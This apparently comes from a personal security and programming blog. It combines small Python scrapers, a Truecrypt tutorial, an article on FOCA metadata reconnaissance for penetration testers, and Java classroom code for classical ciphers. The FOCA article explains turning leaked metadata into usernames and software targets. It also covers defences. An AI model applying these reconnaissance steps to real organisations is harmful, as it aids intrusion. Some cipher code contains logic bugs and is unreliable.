Note: The Guake terminal (yellow font) has been configured to show up on both the screens. For this, I edited the '/usr/bin/guake' and changed the width from '100' to '200'.

So far, I am pleased with this multiple screen set up as it offers me a lot more work space, but it will take a little getting used to.


          USD to INR Exchange Rate Calculator (Xoom, PayPal) Script in Python        
Written by Pranshu Bajpai |  | LinkedIn

I frequently transfer money to India. For this reason, I find myself calculating amounts pertaining to USD to INR conversions using major remit websites such as the following:
  • Xoom
  • PayPal
  • Remitly
  • RIA Money Transfer
  • MoneyDart - Money2Anywhere
  • Trans-Fast
  • USForex Money Transfer
  • IndusInd Bank - Indus Fast Remit
  • State Bank of India
  • ICICI Money2India
  • Axis Bank - AxisRemit
  • Western Union

Since almost all of these websites offer more or less similar services, I usually choose the one that is offering me the best exchange rate. Having said that, I was quickly annoyed by having to visit each of these websites to compare them and determine the one that is offering the best USD to INR exchange rate on the present day. For this reason, I decided to write a Python web scrapping script that would go online, locate the exchange rates germane to all of these major websites and then show them to me for comparison.

Usage: python usdtoinr.py

Download: Github: https://github.com/lifeofpentester/usdtoinr




By default, it shows you the exchange rate grabbed from xoom (without any switch). Or, you can use '-x' or '--xoom' switch to do the same thing.

By using the '-a' or '--all' switch, you can view the current exchange rates corresponding to all major remit websites.



Initially, my 'usdtoinr' python script only displayed the current exchange rate from the major websites, but then I realized that it would be better if they could convert an amount in USD (US dollars) to an amount in INR (Indian Rupees). Accordingly, I added this functionality in the script. You can use the '-c' or '--convert' switch for this purpose.



As I started using PayPal, I added another function in my script that would show me an amount in USD (US dollars) converted to an amount in INR (Indian Rupees) and then deduct PayPal's fees of 4 percent from this amount to show me the money that someone would actually receive in India. To invoke this function, use the '-p' or '--paypal' switch.


Of course, '-h' or '--help' is to see the usage information.

That's all the functionality that is coded in the script at the moment since that's all I needed. With time, I may add more functions should I need them. As with all web scrapping scripts, the functionality of the script depends on the websites from where it is capturing the information pertaining to the exchange rates. If those websites change with time, it might result in the script breaking down. If that is the case, or if you want some other functionality added, feel free to modify the code.

Note: argparse is a nice library that you can use to allow for command line arguments or switches in your scripts.

Note: The ASCII text banner in the script has been generated with a utility called 'figlet'

Source Code:


If you would like to read the code, here it is:


#!/usr/bin/python

import requests
from bs4 import BeautifulSoup
import argparse
import re
import time

def _xoom():
r = requests.get('https://www.xoom.com/india/send-money')
data = r.text

soup = BeautifulSoup(data)

for rate in soup.find_all('em'):
return rate.text

def _all():
r = requests.get('http://www.compareremit.com')
print "[+] Requested information!"
data = r.text
print "[+] Grabbed all exchange rates online!"
soup = BeautifulSoup(data)
for rate in soup.find_all('div',{"class":"c_logo_box"}):
print rate.a.img['alt']
print rate.span.text

def _rate_calc():
ratetext = _xoom()
print "[+] Requested exchange rate from Xoom!"
found = re.search("(?<=\=)(.*?)(?=I)", ratetext)
print "[+] Located today's exhange rate!"
rate = float(found.group())
print "[+] Converting USD to INR now..."
amount = args.convert * rate
return amount

def _paypal():
ratetext = _xoom()
print "[+] Requested exchange rate from Xoom!"
found = re.search("(?<=\=)(.*?)(?=I)", ratetext)
print "[+] Located today's exchange rate!"
rate = float(found.group())
print "[+] Converting USD to INR now..."
print "[+] Calculating amount left after PayPal's 4 percent fee..."
amount = 0.96*(args.paypal*rate)
return amount


parser = argparse.ArgumentParser(description="Script for USD to INR calculations")
parser.add_argument('-x', '--xoom', help='exchange rate from xoom.com', action='store_true')
parser.add_argument('-a', '--all', help='exchange rate from all major remit websites', action='store_true')
parser.add_argument('-c', '--convert', help='USD to INR conversion using current exchange rate', type=float)
parser.add_argument('-p', '--paypal', help='amount after deducting PayPal\'s 4 percent fees', type=float)
args = parser.parse_args()




print """ _ _ _
_ _ ___ __| | |_ ___ (_)_ __ _ __
| | | / __|/ _` | __/ _ \| | '_ \| '__|
| |_| \__ \ (_| | || (_) | | | | | |
\__,_|___/\__,_|\__\___/|_|_| |_|_|

--by Pranshu
"""

_time = time.asctime(time.localtime(time.time()))

print "[i] " + _time


if args.xoom:
rate = _xoom()
print "[i] Exchange Rate: " + rate
elif args.all:
_all()
elif args.convert:
amount = _rate_calc()
print "\n[i]Amount in Rupees according to the exchange rate today: %f" %amount
elif args.paypal:
amount = _paypal()
print "\n[i]Amount in Rupees after deduction of Paypal's fees: %f" %amount
else:
rate = _xoom()
print "[i] Exchange Rate: " + rate
#parser.print_help()

          PhD Comics Downloader | Python Script to Download Piled Higher and Deeper Comics        
Written by Pranshu Bajpai |  | LinkedIn

PhD Comics, by Jorge Cham, provide a funny (but accurate) glimpse into the life of a graduate student. Being a graduate student myself, I have always enjoyed reading this comic.

At some point, I decided to read a bunch of these comic during my travel when I wouldn't be able to access the Internet. Since this is an online comic, this was a problem. I wrote a small python scraping script that is able to visit different pages on the phdcomics website, locate the comic GIFs, and download them on local disk for reading later on.

Usage: python downloadphdcomics.py

Download: Githubhttps://github.com/lifeofpentester/phdcomics


Note that the start comic number and end comic number is hard coded in the script as '1' and '1699' respectively. You can modify the script in any text editor to download a different range of comics.

You can store all of these GIFs in a ZIP file and change the extension from ZIP to CBR. Then, you can use any CBR reader to read these comics.


In case you are interested in reading the code, here it is:


#!/usr/bin/python

"""The PhD Comics Downloader"""
"""
This code fetches PhD comics from www.phdcomics.com
and saves to '/root/'

Written by: Pranshu
bajpai [dot] pranshu [at] gmail [dot] com

"""


from bs4 import BeautifulSoup
from urllib import urlretrieve
import urllib2
import re

for i in range(1, 1699):

url = "http://www.phdcomics.com/comics/archive.php?comicid=%d" %i
html = urllib2.urlopen(url)
content = html.read()
soup = BeautifulSoup(content)

for image in soup.find_all('img', src=re.compile('http://www.phdcomics.com/comics/archive/' + 'phd.*gif$')):
print "[+] Fetched Comic " + "%d" %i + ": " + image["src"]
outfile = "/root/" + "%d" %i + ".gif"
urlretrieve(image["src"], outfile)



          How to Use Truecrypt | Truecrypt Tutorial [Screenshots] | Kali Linux, BackTrack, BackBox, Windows        
Written by Pranshu Bajpai |  | LinkedIn

Data protection is crucial. The importance of privacy--specially concerning sensitive documents--cannot be overstated, and if you’re here, you have already taken the first step towards securing it.

Truecrypt is one of the best encryption tools out there. It’s free and available for Windows and Linux. It comes pre-installed in Kali Linux and Backtrack. I first came across the tool when I was reading ‘Kingpin’ (The infamous hacker Max Butler was using it to encrypt data that could be used as evidence against him).

Here is how you can set up Truecrypt for use in Kali Linux (similar procedures will work in other Linux distros and Windows).

Goto Applications -> Accessories -> Truecrypt

Truecrypt main window opens up. As this is the first time we are using Truecrypt we need to set up a volume for our use.

Click ‘Create Volume’ and the Truecrypt volume creation wizard opens up:


Click on ‘create an encrypted file container’

This container will contain your encrypted files. The files can be of any type, as long as they lie in this container, they will be encrypted after ‘dismounting the volume’.

Now the next screen asks if you want to create a Standard or Hidden Volume. In case of hidden volume, no one would really know that it is there so they can’t ‘force’ you to provide its password.

For now we will just create a ‘Standard’ volume.



On the next screen you will asked for the ‘location’ of this volume. This can be any drive on your computer. This is where your container will lie. The container can be seen at this location but it won’t have any ‘extension’ and will have the name that you provide it during this set up.

Choose any ‘location’ on your computer for the container and carry on to the next step.

A password is now required for this volume. This is the ‘password’ which will be used to decrypt the volume while ‘mounting’ it. Needless to say, it should be strong as a weak password defeats the whole purpose of security/encryption.


Next click on ‘Format’ and the volume creation would begin. You will be shown a progress bar and it will take some time depending on how big your volume size is.



Once your ‘Formatting’ is completed. Your volume is ready to be used. You can place files in there (drag and drop works). Once done ‘Dismount’ this volume and exit Truecrypt.

When you want to access the encrypted files in the container, fire up Truecrypt and click on any ‘Slots’ on the main window.

Now goto ‘Mount’ and point to the location of the container which you selected during setting up the volume.

It will then prompt you for the password.


If you provide the correct password, you’ll see that the volume is mounted on the ‘Slot’ that you selected, if you double-click that ‘Slot’ a new explorer window would open where you can see your decrypted files and work with them. And you can add more files to the container if you want.

After you’re done, ‘Dismount’ the volume and exit Truecrypt.


          FOCA Metadata Analysis Tool        
Written by Pranshu Bajpai |  | LinkedIn

Foca is an easy-to-use GUI Tool for Windows that automates the process of searching a website to grab documents and extract information. Foca also helps in structuring and storing the Metadata revealed. Here we explore the importance of Foca for Penetration Testers


Figure 1: Foca ‘New Project’ Window


Penetration Testers are well-versed in utilizing every bit of Information for constructing sophisticated attacks in later phases.  This information is collected in the ‘Reconnaissance’ or ‘Information gathering’ phase of the Penetration Test. A variety of tools help Penetration Testers in this phase. One such Tool is Foca.
Documents are commonly found on websites, created by internal users for a variety of purposes. Releasing such Public Documents is a common practice and no one thinks twice before doing so. However, these public documents contain important information like the ‘creator’ of the document, the ‘date’ it was written on, the ‘software’ used for creating the document etc.  To a Black Hat Hacker who is looking for compromising systems, such information may provide crucial information about the internal users and software deployed within the organization.

What is this ‘Metadata’ and Why would we be interested in it?
The one line definition of Metadata would be “A set of data that describes and gives information about other data”. So when a Document is created, its Metadata would be the name of the ‘User’ who created it, ‘Time’ when it was created, ‘Time’ it was last modified, the ‘folder path’ and so on. As Penetration Testers we are interested in metadata because we like to collect all possible information before proceeding with the attack. Abraham Lincoln said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe”. Metadata analysis is part of the Penetration Tester’s act of ‘sharpening the axe’. This Information would reveal the internal users, their emails, their software and much more.

Gathering Metadata
As Shown in Figure 1, Foca organizes various Projects, each relating to a particular domain. So if you’re frequently analyzing Metadata from several domains as a Pen Tester, it can be stored in an orderly fashion. Foca lets you crawl ‘Google’, ‘Bing’ and ‘Exalead’ looking for publicly listed documents (Figure 2).


Figure 2: Foca searching for documents online as well as detecting insecure methods
 You can discover the following type of documents:
DOC
DOCX
PPT
PPTX
XLS
XLSX
SWX
SXI
ODT
PPSX
PPS
SXC

Once the documents are listed, you have to explicitly ‘Download All’ (Figure 3).


Figure 3: Downloading Documents to a Local Drive
 Once you have the Documents in your local drive, you can ‘Extract All Metadata’ (Figure 4).

Figure 4: Extracting All Metadata from the downloaded documents
This Metadata will be stored under appropriate tabs in Foca. For Example, ‘Documents’ tab would hold the list of all the documents collected, further classified into ‘Doc’, ‘Docx’, ‘Pdf’ etc. After ‘Extracting Metadata’, you can see ‘numbers’ next to ‘Users’, ‘Folders’, ‘Software’, ‘Emails’ and ‘Passwords’ (Figure 5). These ‘Numbers’ depend on how much Metadata the documents have revealed. If the documents were a part of a database then you would important information about the database like ‘name of the database’, ‘the tables contained in it’, the ‘columns in the tables’ etc.


Figure 5: Foca showing the ‘numbers’ related to Metadata collected


Figure 6: Metadata reveals Software being used internally
Such Information can be employed during attacks. For Example, ‘Users’ can be profiled and corresponding names can be tried as ‘Usernames’ for login panels. Another Example would be that of finding out the exact software version being used internally and then trying to exploit a weakness in that software version, either over the network or by social engineering (Figure 6).
At the same time it employs ‘Fuzzing’ techniques to look for ‘Insecure Methods’ (Figure 2)
Clearly Information that should stay within the organization is leaving the organization without the administrators’ knowledge. This may prove to be a critical security flaw. It’s just a matter of ‘who’ understands the importance of this information and ‘how’ to misuse it.
So Can Foca Tell Us Something About the Network?
Yes and this is one of the best features in Foca. Based on the Metadata in the documents, Foca attempts to map the Network for you. This can be a huge bonus for Pen Testers. Understanding the Network is crucial, especially in Black Box Penetration Tests.

Figure 7: Network Mapping using Foca
As seen in Figure, a lot of Network information may be revealed by Foca. A skilled attacker can leverage this information to his advantage and cause a variety of security problems. For example ‘DNS Snoop’ in Foca can be used to determine what websites the internal users are visiting and at what time.
So is Foca Perfect for Metadata Analysis?
There are other Metadata Analyzers out there like Metagoofil, Cewl and Libextractor. However, Foca seems to stand out. It is mainly because it has a very easy to use interface and the nice way in which it organizes Information. Pen Testers work every day on a variety of command line tools and while they enjoy the smoothness of working in ‘shell’, their appreciation is not lost for a stable GUI tool that automates things for them. Foca does the same.
However, Foca has not been released for ‘Linux’ and works under ‘Windows only’, which may be a drawback for Penetration Testers because many of us prefer working on Linux. The creators of Foca joked about this issue in DEFCON 18“Foca does not support Linux whose symbol is a Penguin. Foca (Seal) eats Penguins”.

Protection Against Such Inadvertent Information Compromise
Clearly, public release of documents on websites is essential. The solution to the problem lies in making sure that such documents do not cough up critical information about systems, softwares and users. Such documents should be internally analyzed before release over the web. Foca can be used to import and analyze local documents as well. It is wise to first locally extract and remove Metadata contained in documents before releasing them over the web using a tool called ’OOMetaExtractor’. Also, a plugin called ‘IIS Metashield Protector’ can be installed in your server which cleans your document of all the Metadata before your server is going to serve it.

Summary

Like many security tools, Foca can be used for good or bad. It depends on who extracts the required information first, the administrator or the attacker. Ideally an administrator would not only locally analyze documents before release, but also take a step ahead to implement a Security Policy within the organization to make sure such Metadata content is minimized (or falsified). But it is surprising how the power of information contained in the Metadata has been belittled and ignored. A reason for this maybe that there are more direct threats to security that the administrators would like to focus their attention on, rather than small bits of Information in the Metadata. But it is to be remembered that if Hackers have the patience to go ‘Dumpster Diving’, they will surely go for Metadata Analysis and an administrator’s ignorance is the Hacker’s bliss.

On the Web


●                     http:// www.informatica64.com/– Foca Official Website


          Affine Cipher Encryption Decryption Source code in Java        
Written by Pranshu Bajpai |  | LinkedIn

Encryption


/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;
import java.io.*;
/**
 *
 * @author Pranshu
 */
public class DICAss19_AffineCipherEnc {
public static void main(String[] args) {
String Msg;
String CTxt = "";

int a = 5;
int b = 8;
int m = 26;

BufferedReader ObjIn = new BufferedReader(
new InputStreamReader(System.in));
try{
System.out.println("Enter your Message(in Caps and without spaces):");
Msg = ObjIn.readLine();

//ENCRYPTION...
for (int i = 0 ; i < Msg.length() ; i++){
CTxt = CTxt + (char)(((a * Msg.charAt(i) + b) % m) + 65);
}

System.out.println("Cipher Text :"+ CTxt);

//ENTERING CIPHER TEXT INTO A FILE...
DICAss0_FileHandling ObjFilHand = new DICAss0_FileHandling();
ObjFilHand.FileWriteFunc("BealeCipher_CTxt.txt", CTxt);
}
catch(Exception err){
System.err.print("Error: " + err);
}
}
}

Decryption


/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;

/**
 *
 * @author Pranshu
 */
public class DICAss20_AffineCipherDec {
public static void main(String[] args) {
String Msg = "";
String CTxt;

int a = 5;
int b = 8;
int m = 26;
int a_inv = 0;
int flag = 0 ;

//Finding a_inverse...
for (int i = 0 ; i < 26 ; i++){
flag = (a * i) % 26;
if (flag == 1){
a_inv = i;
}
}

try{
DICAss0_FileHandling ObjFileHand = new DICAss0_FileHandling();
CTxt = ObjFileHand.FileReadFunc("BealeCipher_CTxt.txt");
System.out.println("CIPHER TEXT IS :"+ CTxt);


//DECRYPTION...
for (int i = 0 ; i < CTxt.length() ; i++){
Msg = Msg + (char)(((a_inv * (CTxt.charAt(i) - b)) % 26) + 65);
}

System.out.println("Original Message :"+ Msg);
}
catch(Exception err){
System.err.print("Error: " + err);
}
}
}

          Vignere Cipher Encryption Decryption Source code in Java        
Written by Pranshu Bajpai |  | LinkedIn

Encryption




/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;

/**
 *
 * @author Pranshu
 */
public class DICAss14_VignereEnc {
public static void main(String[] args){
String Msg = "IAMUNDERATTACK";
//String Msg = "vaibs";
String Key = "CRYPTO";

String CTxt = "";

int MsgLen = Msg.length();
int KeyLen = Key.length();

int i;

//CREATING FINAL KEY TO ENCRYPT THE MESSAGE!!!
String KeyFinal = "";
if( MsgLen < KeyLen){
for( i = 0 ; i < MsgLen ; i++){
KeyFinal = KeyFinal + Key.charAt(i);
}
//System.out.println(KeyFinal);
}
else{
int Div = MsgLen / KeyLen;
int Rem = MsgLen % KeyLen;

for (i = 0 ; i < Div ; i++){
KeyFinal = KeyFinal + Key;
}

for( i = 0 ; i < Rem ; i++){
KeyFinal = KeyFinal + Key.charAt(i);
}
//System.out.println(KeyFinal);
}

System.out.println("Msg : " + Msg);
System.out.println("Key : " + KeyFinal);

//ENCRYPTION...
int temp;
char c;
int sum;
for(i = 0 ; i < MsgLen; i++){
sum = Msg.charAt(i) + KeyFinal.charAt(i);
if (sum >= 155 ){
temp = sum - 90;
}
else {
temp = sum - 64;
}

c = (char) temp;
CTxt = CTxt + c;
}
System.out.println("CiP : " + CTxt);
}
}

Decryption



/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;

/**
 *
 * @author Pranshu
 */
public class DICAss15_VignereDec {
public static void main(String[] args){
String Msg = "";
//String Msg = "vaibs";
String Key = "CRYPTO";

String CTxt = "LSLKHSHJZJNPFC";

int CTxtLen = CTxt.length();
int KeyLen = Key.length();

//GENERATING FINAL KEY TO DECRYPT CIPHER TEXT!!!
int i;
String KeyFinal = "";
if( CTxtLen < KeyLen){
for( i = 0 ; i < CTxtLen ; i++){
KeyFinal = KeyFinal + Key.charAt(i);
}
//System.out.println(KeyFinal);
}
else{
int Div = CTxtLen / KeyLen;
int Rem = CTxtLen % KeyLen;

for (i = 0 ; i < Div ; i++){
KeyFinal = KeyFinal + Key;
}

for( i = 0 ; i < Rem ; i++){
KeyFinal = KeyFinal + Key.charAt(i);
}
//System.out.println(KeyFinal);
}

System.out.println("CiP : " + CTxt);
System.out.println("Key : " + KeyFinal);

//DECRYPTION...
int temp;
char c;
int sum;

for(i = 0 ; i < CTxtLen; i++){
sum = CTxt.charAt(i) - KeyFinal.charAt(i);
if (sum >= 0 ){
temp = sum + 64;
}
else {
temp = sum + 90;
}

c = (char) temp;
Msg = Msg + c;
}
System.out.println("Msg : " + Msg);
}
}

          One Time Pad Encryption Decryption Source code in Java        
Written by Pranshu Bajpai |  | LinkedIn

Encryption


/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;
import java.util.Random;
import java.io.*;
/**
 *
 * @author Pranshu
 */
public class DICAss17_OneTimePadEnc {
public static void main(String[] args) {
try{
String Msg ;
String Key = "";
String CTxt = "";

//taking message from user
BufferedReader ObjIn = new BufferedReader(
new InputStreamReader(System.in));
System.out.print("Enter the Message(Without any space and in Block Letters): \n");
Msg = ObjIn.readLine();

//to Generate random no. between 0-25 and Generating Key
Random randomGenerator = new Random();
for (int idx = 1; idx <= Msg.length(); ++idx){
int randomInt = randomGenerator.nextInt(26);
Key = Key + (char)(65+randomInt);
}
System.out.println("Key: \n" + Key);

//ENCRYPTION...
int temp;
char c;
int sum;
for(int i = 0 ; i < Msg.length(); i++){
sum = Msg.charAt(i) + Key.charAt(i);

if (sum >= 155 ){
temp = sum - 90;
}
else {
temp = sum - 64;
}

c = (char) temp;
CTxt = CTxt + c;
}
System.out.println("CiP : " + CTxt);

//CREATING FILES FOR THE KEY & CIPHER TEXT... FOR TRANSMISSION!!!
DICAss0_FileHandling ObjFileHand = new DICAss0_FileHandling();
ObjFileHand.FileWriteFunc("OTP_Key.txt", Key);
ObjFileHand.FileWriteFunc("OTP_CipherText.txt", CTxt);
}
catch(Exception err){
System.err.println("Error: " + err);
}
}
}

Decryption



/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;

/**
 *
 * @author Pranshu
 */
public class DICAss18_OneTimePadDec {
public static void main(String[] args){
String Msg = "";
String Key;
String CTxt;

DICAss0_FileHandling ObjFileHand = new DICAss0_FileHandling();
Key = ObjFileHand.FileReadFunc("OTP_Key.txt");
CTxt = ObjFileHand.FileReadFunc("OTP_CipherText.txt");

//DECRYPTION...
int temp;
char c;
int sum;

for(int i = 0 ; i < CTxt.length(); i++){
sum = CTxt.charAt(i) - Key.charAt(i);
if (sum >= 0 ){
temp = sum + 64;
}
else {
temp = sum + 90;
}

c = (char) temp;
Msg = Msg + c;
}
System.out.println("Msg : " + Msg);
}
}

          Character Frequency Analysis in Java | Source Code | Simple Cryptanalysis        
Written by Pranshu Bajpai |  | LinkedIn

Source Code



/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.util.Scanner;

/**
 *
 * @author Pranshu
 */

public class DICAss16_CharFrequency {


public static void main(String[] args) throws FileNotFoundException, IOException {

File f = new File("test.txt");

Scanner input = new Scanner(System.in);
BufferedWriter w = new BufferedWriter(new FileWriter(f));

System.out.println("Enter text in book");

w.write(input.nextLine());

w.flush();
w.close();

BufferedReader r = new BufferedReader(new FileReader(f));

String str;
String alphabets = "abcdefghijklmnopqrstuvwxyz";
String alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
String char1 = "";
String char2 = "";
String char3 = "";
String char4 = "";

str = r.readLine();
System.out.println(str);

char ch;
char ch1;
char ch2;
char ch3 = 0;
float[] arr = new float[26];
int k;
float len;

// for single character frequency...
for(int i=0; i < alphabets.length(); i++) {
ch = alphabets.charAt(i);
ch1 = alpha.charAt(i);
k = 0;
for(int j=0; j < str.length(); j++) {
if((ch == str.charAt(j))||(ch1 == str.charAt(j))) {
k++;
}
}

System.out.println("frequency of " + alphabets.charAt(i) + "= " + k);
len = str.length();
arr[i] = k / len;

}

System.out.println("________________________________________________");

for(int i = 0; i < alphabets.length(); i++) {
System.out.println("Probability of " + alphabets.charAt(i) + " = " + arr[i]);
}

// for character pair frequency...
System.out.println("________________________________________________");

for(int i = 0; i < 26; i++) {
ch = (char) alphabets.charAt(i);
char1 = "";
char1 = char1 + ch;
for(int j = 0; j < 26; j++) {
ch1 = (char) alphabets.charAt(j);
char2 = "";
char2 = char2 + ch1;

k = 0;
for(int l = 0; l < str.length() - 1; l++) {
if((ch == str.charAt(l) && ch1 == str.charAt(l+1))) {
k++;
}

}

System.out.println("Frequency for " + char1 + char2 + "= "+k);
}
}

System.out.println("________________________________________________");

//for character triplet frequency...
for(int i = 0; i < 26; i++) {
ch = (char) alphabets.charAt(i);
char1 = "";
char1 = char1 + ch;
for(int j = 0; j < 26; j++) {
ch1 = (char) alphabets.charAt(j);
char2 = "";
char2 = char2 + ch1;

for(int x = 0; x < 26; x++) {
ch2 = (char) alphabets.charAt(x);
char3 = "";
char3 = char3 + ch2;
k = 0;

for(int l = 0; l < str.length() - 2; l++) {
if((ch == str.charAt(l) && ch1 == str.charAt(l+1)
&& ch2 == str.charAt(l+2))) {
k++;
}

}

System.out.println("for " + char1 + char2 + char3 + "= "+k);
}
}
}

System.out.println("________________________________________________");

// for character quadruplet frequency...
for(int i = 0; i < 26; i++) {
ch = (char) alphabets.charAt(i);
char1 = "";
char1 = char1 + ch;

for(int j = 0; j < 26; j++) {
ch1 = (char) alphabets.charAt(j);
char2 = "";
char2 = char2 + ch1;

for(int x = 0; x < 26; x++) {
ch2 = (char) alphabets.charAt(x);
char3 = "";
char3 = char3 + ch2;

for(int y = 0; y < 26; y++) {
ch3 = (char) alphabets.charAt(y);
char4 = "";
char4 = char4 + ch3;
}

k = 0;
for(int l = 0; l < str.length() - 3; l++) {
if((ch == str.charAt(l) &&
ch1 == str.charAt(l+1) &&
ch2 == str.charAt(l+2) &&
ch3 == str.charAt(l+3))) {
k++;
}
}
System.out.println("for " + char1 + char2 + char3 + char4 + "= "+k);
}
}
}
}
}

          XOR Encryption Decryption Java Source Code        
Written by Pranshu Bajpai |  | LinkedIn

Encryption



package DICAss;

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */

/**
 *
 * @author Pranshu
 */
public class DICAss10_XOREncryption {
public static void main(String[] args){
String Msg = "I AM UNDER ATTACK!";
char Key = 'k';
String CTxt = "";
int xor;
char temp;
for(int i = 0 ; i < Msg.length() ; i++){
xor = Msg.charAt(i) ^ Key;
temp = (char)xor;
CTxt = CTxt + temp;
}

System.out.println(CTxt);
}
}

Decryption




package DICAss;

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */

/**
 *
 * @author Pranshu
 */
public class DICAss11_XORDecryption {
public static void main(String[] args){
String CTxt = "\"K*&K>%/.9K*??*( J";
char Key = 'k';
String Msg = "";
int xor;
char temp;
for(int i = 0 ; i < CTxt.length() ; i++){
xor = CTxt.charAt(i) ^ Key;
temp = (char)xor;
Msg = Msg + temp;
}

System.out.println(Msg);
}
}

          Caesar Cipher Encryption Decryption Java Source code        
Written by Pranshu Bajpai |  | LinkedIn

Source code for Caesar Cipher Encryption





package DICAss;

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */

/**
 *
 * @author Pranshu
 */
public class DICAss12_CaesorCipherEnc {
public static void main(String[] args)
{
String Msg = "IAMUNDERATTACKW";
int Key = 3;

String CTxt = "";

int temp;
char c;
for(int i = 0 ; i < Msg.length() ; i++){
if (Msg.charAt(i) + Key > 90){
temp = (Msg.charAt(i) + Key) -26;
}
else{
temp = (Msg.charAt(i) + Key);
}

c = (char) temp;
CTxt = CTxt + c;
}

System.out.println(CTxt);
}
}

Source Code for Caesar Cipher Decryption


package DICAss;

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */

/**
 *
 * @author Pranshu
 */
public class DICAss13_CaesorCipherDec {
public static void main(String[] args)
{
String CTxt = "LDPXQGHUDWWDFNZC";
int Key = 3;

String Msg = "";

int temp, num;
char c;
for(int i = 0 ; i < CTxt.length() ; i++){
num = ((CTxt.charAt(i) - Key) - 64);
if ( num <= 0){
temp = (90 - (num * (-1))%26);
}
else {
temp = (( num % 26) + 64);
}

c = (char) temp;
Msg = Msg + c;
}
System.out.println(Msg);
}
}

          Binary Hex and Octal Conversion in Java | Example | Source code        
Written by Pranshu Bajpai |  | LinkedIn

Source Code




package DICAss;

class DICAss7_Conversion
{
public static void main(String[] args)
{
String binary = "111";
String hex = "A";
String oct = "772";

int decimal1 = Integer.parseInt(binary, 2);

int decimal2 = Integer.parseInt(hex, 16);

int decimal3 = Integer.parseInt(oct, 8);

System.out.println(decimal1);
System.out.println(decimal2);
System.out.println(decimal3);

}
}

          Simple Switch Case in Java | Example | Source code        
Written by Pranshu Bajpai |  | LinkedIn

Source Code




package DICAss;

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
import java.io.*;
/**
 *
 * @author Pranshu
 */
public class DICAss6_SwitchCase {
public static void main(String[] args){

int ch;

BufferedReader BRObj = new BufferedReader
(new InputStreamReader(System.in));

System.out.print("Give Input : ");

try{
ch = Integer.parseInt(BRObj.readLine());

switch (ch)
{
case 1:
System.out.println("Jan");
break;

case 2:
System.out.println("Feb");
break;

case 3:
System.out.println("Mar");
break;

case 4:
System.out.println("Apr");
break;

case 5:
System.out.println("May");
break;

case 6:
System.out.println("Jun");
break;

case 7:
System.out.println("July");
break;

case 8:
System.out.println("Aug");
break;

case 9:
System.out.println("Sept");
break;

case 10:
System.out.println("Oct");
break;

case 11:
System.out.println("Nov");
break;

case 12:
System.out.println("Dec");
break;

default:
System.out.println("Wrong Choice!!!");

}
}
catch(Exception err){
System.out.println("Error : " + err);
}
}
}

          Simple Input Output Handling in Java | Example | Source code        
Written by Pranshu Bajpai |  | LinkedIn

This code illustrates I/O handling with Java

Source Code




package DICAss;

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
import java.io.*;
/**
 *
 * @author Pranshu
 */
public class DICAss5_IOHandle {
public static void main(String[] args){

String Str;

BufferedReader BRObj = new BufferedReader
(new InputStreamReader(System.in));

System.out.print("Give Input : ");

try{
Str = BRObj.readLine();
System.out.println("Input was " + Str);
}
catch(Exception err){
System.out.println("Error : " + err);
}
}
}

          Simple File Handling in Java | Example | Source code        
Written by Pranshu Bajpai |  | LinkedIn

Here's a simple code that illustrates File Handling in Java:

Source Code




/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package DICAss;
import java.io.*;

/**
 *
 * @author Pranshu
 */
public class DICAss0_FileHandling {



public static void main(String[] a){
int Flag = 0;
String FileName;
String FileBody;
int opt;


BufferedReader ObjTake = new BufferedReader(
new InputStreamReader(System.in));

System.out.println("Choose an Option: \n 1. File Writing \n 2. File Reading");

try{
System.out.println("What you want to do?? enter option : ");
opt = Integer.parseInt(ObjTake.readLine());

switch (opt){
case 1:
System.out.print("Enter Name of the File (with extension): ");
FileName = ObjTake.readLine();

System.out.print("Enter Body of the File : ");
FileBody = ObjTake.readLine();

Flag = FileWriteFunc(FileName, FileBody);

if(Flag == 0){
System.err.println("Unable to write!!!");
}
break;

case 2:
System.out.print("Enter Name of the File (with extension): ");
FileName = ObjTake.readLine();

String FText;
FText = FileReadFunc(FileName);
System.out.println("Text in file : " + FText);

if(FText == null){
System.err.println("Unable to read!!!");
}
break;

default:
System.err.println("Invalid Option!!!");
}
}
catch(Exception err){
System.err.println("Error : " + err);
}
}

public static int FileWriteFunc(String FName, String FBody){
FileOutputStream ObjOut;
PrintStream ObjPrint;

try{
ObjOut = new FileOutputStream(FName);

ObjPrint = new PrintStream(ObjOut);

ObjPrint.print(FBody);
ObjPrint.close();

//System.out.println("Writing Complete!!!");

return 1;
}
catch(Exception err){
System.err.println("Error: " + err);
return 0;
}
}

public static String FileReadFunc(String FName){
try{
FileInputStream FStream = new FileInputStream(FName);

DataInputStream ObjIn = new DataInputStream(FStream);

String str = "";
while (ObjIn.available() != 0){
//System.out.println(ObjIn.readLine());
str = str + ObjIn.readLine();
}

ObjIn.close();

//System.out.println("reading Complete!!!");
return str;
}

catch(Exception err){
System.err.println("Error : " + err);
return null;
}
}
}

          'Device Not Managed' by NetworkManager - Debian / Ubuntu / Kali Linux | Problem [Solved]        
Written by Pranshu Bajpai |  | LinkedIn

Problem Scenario:

When you install a fresh copy of Kali linux / Debian / Ubuntu, you may be plagued by this error which wouldn't let you connect to the 'Wired' network. The Wireless (wlan0) might work just fine but under 'Wired' Network, it says 'Device not managed'

Solution:

If this interface appears in '/etc/network/interfaces' file, Network Manager won't manage it by default and we need to change this behavior.

To do this, make modifications in the file:
#vi /etc/NetworkManager/NetworkManager.conf
Change 'managed-false' to 'managed=true'

Now restart the Network Manager
#service network-manager restart
